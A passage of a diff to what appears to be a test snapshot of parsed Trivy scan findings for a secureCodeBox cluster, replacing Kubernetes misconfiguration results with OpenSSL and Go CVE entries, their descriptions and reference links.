"value": "https://ubuntu.com/security/notices/USN-6188-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "category": "Vulnerability", + "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.allowPrivilegeEscalation' to false)", + "mitigation": undefined, + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'minio' of Deployment 'securecodebox-operator-minio' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://bugzilla.redhat.com/2081494", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://bugzilla.redhat.com/2087913", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://bugzilla.redhat.com/2104905", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsGroup' > 10000)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20220131195533-30dcbda58838", - "packageName": "golang.org/x/crypto", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", - ], - }, - "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://www.openssl.org/news/secadv/20220705.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "timing attack in RSA Decryption implementation", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", - ], - }, - "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 